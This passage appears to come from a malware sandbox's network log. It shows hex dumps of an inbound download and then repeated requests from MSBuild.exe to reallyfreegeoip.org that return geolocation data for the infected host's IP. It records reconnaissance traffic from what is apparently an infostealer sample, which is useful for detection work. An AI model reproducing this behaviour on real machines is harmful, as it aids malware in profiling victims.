OVbn%9pa6{Xqf3ru6%QT&mU98T+b[E'z+fwPq&k(PC14kvsjeg%$'{[\|^eK(A)fb@n@8P:]
2024-04-11 09:32:56 UTC	1369	IN	Data Raw: b4 43 e6 11 35 28 87 73 d9 14 08 0a ae 67 ec 2c 86 fd 4d 8d 83 ac ad 0a db 8b 60 89 e5 13 91 bd f4 2a 31 61 ea 90 53 dd d6 a9 0d 9c c6 52 50 7f 11 a3 b4 a2 6a 9b 7a 65 14 88 25 ad d9 01 73 19 18 42 83 9e 0c e4 3b 61 54 90 a4 8c 5a c4 86 61 eb 40 eb 6c fc b0 ab ec fc 77 81 75 af 3e 5c 78 46 7c 1e 3a e5 0c 0f a8 8d 13 cf 73 e1 15 96 f5 57 d5 3f 2d 48 ea c1 b0 22 4a 84 9f fd 5d 60 0e cf dd 89 10 be 30 03 b4 bd 15 a3 36 8a 09 c7 e1 b0 9d d5 5a 3e 77 12 15 ba 7e 81 2c 35 d4 59 06 35 c5 73 04 3f ab 3d 3c f7 1b ee ba 1a 02 4b 60 95 9b 2a 2e 69 cc f5 4c 69 20 fd 58 79 0f 42 d9 b3 af 7a 3c 8f a8 d5 1d 08 23 b4 b7 d9 65 de df 61 c0 9f 05 62 1d 8e a2 79 d4 9d b0 0f ce 0c de 60 1d db 14 81 a5 59 e1 06 48 a6 93 d0 8b 87 e1 34 3d 3e 40 07 99 bc 0b a3 16 c9 44 49 3a 52 Data Ascii: C5(sg,M`1aSRPjze%sB;aTZa@lwu>\xF\|:sW?-H"J]`06Z>w~,5Y5s?=<K`.iLi XyBz<#eaby`YH4=>@DI:R
2024-04-11 09:32:56 UTC	1369	IN	Data Raw: 89 6e 57 bc 70 98 66 fc 27 11 0c 54 24 10 42 ba 9a 1d c9 6f 91 a6 ac 2c 8c 47 a3 3e 10 ea 3e 57 0d a5 0e e5 85 20 e1 1d 7b b4 70 d8 80 8e b6 82 a4 78 c2 67 c6 37 fa 39 e3 d4 9c a3 73 98 b3 60 23 bb 12 f6 ca eb 38 5f 68 20 20 64 1e 31 9e ff cf e9 a4 cc 0e 93 b0 b7 e2 b4 96 a5 de 8d 7f 0b f0 99 27 30 5a 53 eb ae f9 bc 26 b3 96 11 cf 31 62 04 97 ce 4c 0d f5 ff 92 96 7e 50 e4 5b 58 88 df d9 7b aa ef 3c 52 69 8c 71 87 e2 7e 78 79 e9 82 de e5 c9 03 13 27 1b 25 bc d3 e9 9f 80 69 99 d9 2c ed e0 05 5f 97 1c 9a c3 7f 4f f5 f2 8e fa 18 94 bb c6 2c 0d 3c 31 ed ca ca 0f 89 53 2b 87 a6 8e e2 d7 67 fd 73 0f 04 db dc 22 fc 30 ce 8f 33 96 2c f7 aa 39 1e 7b bf 15 aa ca a0 24 f5 50 7a dc 47 89 d3 e3 73 a6 35 c9 10 38 f1 44 bc e5 c3 61 54 04 69 9b 44 03 26 88 12 a8 63 ea 9f Data Ascii: nWpf'T$Bo,G>>W {pxg79s`#8_h d1'0ZS&1bL~P[X{<Riq~xy'%i,_O,<1S+gs"03,9{$PzGs58DaTiD&c
2024-04-11 09:32:56 UTC	1369	IN	Data Raw: 66 7d 93 23 01 d1 2b ca 34 83 aa 0f 29 ad ba b6 12 2a c0 37 01 81 25 58 3e 26 95 58 88 45 07 7f 0b ea 86 99 0f 10 1d 71 e6 15 24 a5 c6 4a 8c e6 ea 2f d5 73 70 5a 42 d8 38 84 80 34 3a 79 6c 4c 97 d5 67 6b 0f ec 63 5d b3 90 cc 51 e9 f5 17 8d a5 43 0d 07 dc c9 3e 25 fc 87 3f 8f 9a 3c d6 9e bf 55 25 db e4 04 aa a1 38 7c 6e fa ac 4e a9 77 c0 e3 da a7 6e 8f bf ab ef 27 b8 50 47 c1 7f 6d 66 b7 a9 ec 1f b7 f2 bf 79 a8 67 8b d0 5a 64 27 cc 6c aa c2 3b d6 70 f9 d8 1b 0f 05 4d f5 ac 92 2d 2d f9 38 9e fb cb 10 a8 e3 46 90 90 76 2f 78 93 ab 32 88 e2 e8 3d 5c be 34 14 e2 a4 ed 84 25 0c 7f a7 6d 77 b2 6f 2a 0a 0d 2d b1 2c 17 19 c6 a1 11 98 56 c1 e0 06 c0 93 20 ae 6a e1 91 fe f7 f2 12 87 fa 7e 62 96 a7 ec 0a 41 fa 1a be ea 9f c3 78 08 c9 24 c3 5c 63 c7 d0 ee ba a3 c4 b0 Data Ascii: f}#+4)7%X>&XEq$J/spZB84:ylLgkc]QC>%?<U%8\|nNwn'PGmfygZd'l;pM--8Fv/x2=\4%mwo-,V j~bAx$\c
2024-04-11 09:32:56 UTC	1369	IN	Data Raw: 36 8e 81 2f ab 60 ef 9b 84 e2 ae ad df 63 09 b5 56 39 1b 4e 6a d2 a9 7a 7a 18 35 a2 c3 b1 ac 0d 4f 7b 36 79 65 5d c7 4d 20 6f fe 68 0d 3f 8e 03 a6 65 2c a1 77 50 33 31 f5 a4 43 70 4e 8c f4 ed 08 96 0e a8 40 99 b6 b3 3a 70 d6 a5 a6 7a 86 4c 8d 4b 31 56 9d ab 4b d6 41 bf f6 88 1d 88 61 10 8d 1b 7f 8d 90 a5 ee 53 cf 69 48 3a 7d 4a 71 69 bd da 78 69 b5 34 9a 44 2a 4e a4 e3 64 d9 33 a6 e7 aa 2b 33 b5 fa da a2 22 33 fa e9 54 db 40 12 07 6e 42 e5 c1 7f 05 07 fe 54 12 f1 22 72 c4 39 89 fa d6 9a 06 d0 5b e3 72 8f c9 d7 e8 23 ef 19 b0 47 db 7d c3 14 7d 62 5e b9 97 be c5 97 ec 3e dc 03 51 2c 97 42 ed 33 1e 53 00 26 5f f9 a4 94 61 31 26 1b 0a 5f 12 7c 7b 44 72 5b a0 61 48 8b 02 e0 4c 9b ff 99 fb b0 7d 7e 44 b7 8a 5a 10 e2 32 ef eb d7 60 75 92 e8 af fd 01 04 ac d0 fa Data Ascii: 6/`cV9Njzz5O{6ye]M oh?e,wP31CpN@:pzLK1VKAaSiH:}Jqixi4D*Nd3+3"3T@nBT"r9[r#G}}b^>Q,B3S&_a1&_\|{Dr[aHL}~DZ2`u
2024-04-11 09:32:56 UTC	1369	IN	Data Raw: e3 0f 99 a4 bc be 51 da bb d6 6d 37 af 30 6c 8d 3e 49 a0 f7 f8 1b ea 4f 4d 17 b8 94 48 e3 45 7d 74 9e ee df 58 a4 7f 62 ca 29 7c bf 0a 0d 6f 6f 22 84 fc 84 54 b2 a2 ff 78 f0 4d 1f 02 8b 82 e5 60 d4 2c 49 a5 3d 74 70 7f fb 51 c1 37 18 48 11 63 a3 11 f4 93 81 0d d9 43 fa b2 6c 01 2e aa 2f da a8 32 88 c6 55 87 c2 eb 40 46 bd 31 ae 6e 4d 6a f5 7d 7f 0d 5d 92 03 50 bd 93 eb 41 eb 6b f4 4b 4b 90 29 6f 50 1d 9a b6 18 46 85 af df 56 c2 b1 2a 8d 13 9e 6a bc 83 e7 0c aa 2d 12 dd f8 56 9e 96 76 f1 28 c5 9a 36 5c 51 3d 29 7f ae 7b 11 64 89 1b 66 63 c1 8c c1 21 3f 82 ba 49 60 e2 0e 8e 77 16 9a 4b 3c 5c da ba a6 e5 66 7c 5d 79 05 14 4a 3d 43 3e 5e 1c f4 00 f3 50 f6 13 6c 20 d4 c5 4a 27 e5 34 5c cc 02 9d d3 78 a5 4c 2d 6f dc aa c4 54 ce 3a db 50 cb aa b6 81 f9 93 3d b8 Data Ascii: Qm70l>IOMHE}tXb)\|oo"TxM`,I=tpQ7HcCl./2U@F1nMj}]PAkKK)oPFV*j-Vv(6\Q=){dfc!?I`wK<\f\|]yJ=C>^Pl J'4\xL-oT:P=
2024-04-11 09:32:56 UTC	1369	IN	Data Raw: 09 b9 9b f6 4c a4 dd 69 a8 71 80 73 cb 51 64 42 ec dd c0 70 70 2c fd 2d d7 a6 85 73 38 b5 8d 15 cf d8 ed 57 d7 ec 7f 7f 1a 46 65 81 4d c7 22 c3 10 9a 46 ea 3f 43 14 15 02 18 6c bf 5b 80 b8 d4 08 c8 49 a9 74 fe 87 9d d2 dc 82 e3 ae fb 18 a9 49 59 e9 85 96 73 e4 12 82 bf 1e e6 95 04 47 2e ae 5f ed ab a4 b8 4e df ee 5f c6 eb f2 07 e6 be b4 d5 67 f0 0c 65 43 12 a3 b1 1f 3a 69 73 65 6c c3 8f a9 12 77 b2 6e 00 56 94 8c ad cd 21 c1 92 3f 37 a7 9e 06 2c 12 b0 2c 33 a1 b9 58 5b 8e 0b 7c 6a f2 f7 60 81 2e b7 13 bb bb 90 b2 6c 16 7f 3b f9 d6 bc 92 70 2b 5d 33 d6 ac ff dd ff 56 38 34 3e 95 fc 31 8b 04 28 1b 39 6b 0f 73 5e ef 7a 18 23 94 0f fb c8 d2 4d dd 2e 6b 24 f1 44 87 46 36 b8 c5 77 f2 3d ce 14 af ea 02 dc 2d 01 9f 81 a3 0d de eb d1 61 cc b9 46 71 4d 3a 8d 55 17 Data Ascii: LiqsQdBpp,-s8WFeM"F?Cl[ItIYsG._N_geC:iselwnV!?7,,3X[\|j`.l;p+]3V84>1(9ks^z#M.k$DF6w=-aFqM:U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49732	172.67.177.134	443	5640	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-11 09:33:20 UTC	87	OUT	GET /xml/156.146.36.197 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-11 09:33:21 UTC	697	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: MISS Last-Modified: Thu, 11 Apr 2024 09:33:21 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YgL8hKcoSFKMZnY5J%2FcGaTfh6RELTDtfUln2Mea5i3V0%2Bl11ft0YC0zZu7BuAhrs6XGm16z1rAHRBmokLpIUi9CoeRER2GjzPla5bTZhfVpB%2B%2FKWr8F7QrZYPbXxeXoU2ifCjmiS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8729f97daed642e2-EWR alt-svc: h3=":443"; ma=86400
2024-04-11 09:33:21 UTC	343	IN	Data Raw: 31 35 30 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 Data Ascii: 150<Response><IP>156.146.36.197</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37
2024-04-11 09:33:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49734	172.67.177.134	443	5640	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-11 09:33:21 UTC	63	OUT	GET /xml/156.146.36.197 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-11 09:33:21 UTC	704	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 0 Last-Modified: Thu, 11 Apr 2024 09:33:21 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=41164KStqDfgNCTpobHv91MKglcTTtUXo37v5xxNAsffMd3rkW5FYf49Tpc7iHc1S%2FGaDbZD%2F%2BHo9pLHR04%2FrhzFGflABQIEMdUW2KdnUsY77boLigehjGsyuLY5KXi6fXhQEUX1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8729f983184843e2-EWR alt-svc: h3=":443"; ma=86400
2024-04-11 09:33:21 UTC	343	IN	Data Raw: 31 35 30 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 Data Ascii: 150<Response><IP>156.146.36.197</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37
2024-04-11 09:33:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49736	172.67.177.134	443	5640	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-11 09:33:22 UTC	63	OUT	GET /xml/156.146.36.197 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-11 09:33:22 UTC	704	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:22 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1 Last-Modified: Thu, 11 Apr 2024 09:33:21 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9rg10SBnazooCc6fphixBTtiH05GC4WkmzPcvRHXTYZlThnj99RgHaurojwt2N4SugzbAHhh3V5t9SNVO6OEnxP7DRLPjp0qQliWn%2BHk0hFQncvqzh6LS%2F%2FW5zUC8PNL2%2FYZPQeJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8729f987a9ff0f8f-EWR alt-svc: h3=":443"; ma=86400
2024-04-11 09:33:22 UTC	343	IN	Data Raw: 31 35 30 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 Data Ascii: 150<Response><IP>156.146.36.197</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37
2024-04-11 09:33:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49738	172.67.177.134	443	5640	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-11 09:33:23 UTC	87	OUT	GET /xml/156.146.36.197 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-11 09:33:23 UTC	706	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:23 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 2 Last-Modified: Thu, 11 Apr 2024 09:33:21 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZifJHXgZe5cpbG1CBHu%2Bjcesaz7XiTXJlwwuLoU4D4291do7pr2ltakilUJw2q4pYTnx%2B%2F1mDIXapBpFqvrzCGavp0MR8LG6CtFHhWjLmGNijR%2FlVxM8aGHTAxm%2FLAdN9VFyK4sF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8729f98f4d0618ee-EWR alt-svc: h3=":443"; ma=86400
2024-04-11 09:33:23 UTC	343	IN	Data Raw: 31 35 30 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 Data Ascii: 150<Response><IP>156.146.36.197</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37
2024-04-11 09:33:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49740	172.67.177.134	443	5640	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-11 09:33:25 UTC	63	OUT	GET /xml/156.146.36.197 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-11 09:33:25 UTC	704	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:25 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 4 Last-Modified: Thu, 11 Apr 2024 09:33:21 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XXtYY4N3G5djWrZD7znitUcdCvDKq9yldwBfjAi0%2FCQpChaX5bOqun1sG8zEwjtgqSDtdUsLkCcVAfAkFaOWdW2bFd%2BGO0%2BTfscDkB%2Bw7MuY2hriGrdElZCAtqlrDnqhOdIcTkQ3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8729f99d3be2c40e-EWR alt-svc: h3=":443"; ma=86400
2024-04-11 09:33:25 UTC	343	IN	Data Raw: 31 35 30 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 Data Ascii: 150<Response><IP>156.146.36.197</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37
2024-04-11 09:33:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49743	172.67.177.134	443	5640	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-11 09:33:31 UTC	87	OUT	GET /xml/156.146.36.197 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-11 09:33:31 UTC	707	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 10 Last-Modified: Thu, 11 Apr 2024 09:33:21 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G4Q5GaicqR5fMIKz3BYGAy4uk4K49Mb3ESRuS9XNc%2FX89DHcNw%2Fa17CdrLW%2F5NvGC5W8Tn9l2BuqloMJdx9EaKmsAky%2FggxqHwFT9ZZ4UU7vvxEVRnjsyCOv99Y4%2F9hlnq76i3Xx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8729f9c249157c7e-EWR alt-svc: h3=":443"; ma=86400
2024-04-11 09:33:31 UTC	343	IN	Data Raw: 31 35 30 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 Data Ascii: 150<Response><IP>156.146.36.197</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37
2024-04-11 09:33:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49745	172.67.177.134	443	5408	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-11 09:33:34 UTC	87	OUT	GET /xml/156.146.36.197 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-11 09:33:34 UTC	709	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:34 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 13 Last-Modified: Thu, 11 Apr 2024 09:33:21 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k68DGdhp%2FUwM0pf2zsIUWuJRi94gWarWzsYleyI62tB9e%2FuR%2ByDxJIy82x%2BwmwGJ1XjvQTcGXVpSA4ZYil995vFXY%2F6cw25yLhDi5%2BuwtX92hYWfGLILLLgD9hCH09EIeDaR6GRC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8729f9d1db3143d5-EWR alt-svc: h3=":443"; ma=86400
2024-04-11 09:33:34 UTC	343	IN	Data Raw: 31 35 30 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 Data Ascii: 150<Response><IP>156.146.36.197</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37
2024-04-11 09:33:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49746	172.67.177.134	443	5408	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-11 09:33:34 UTC	63	OUT	GET /xml/156.146.36.197 HTTP/1.1 Host: reallyfreegeoip.org
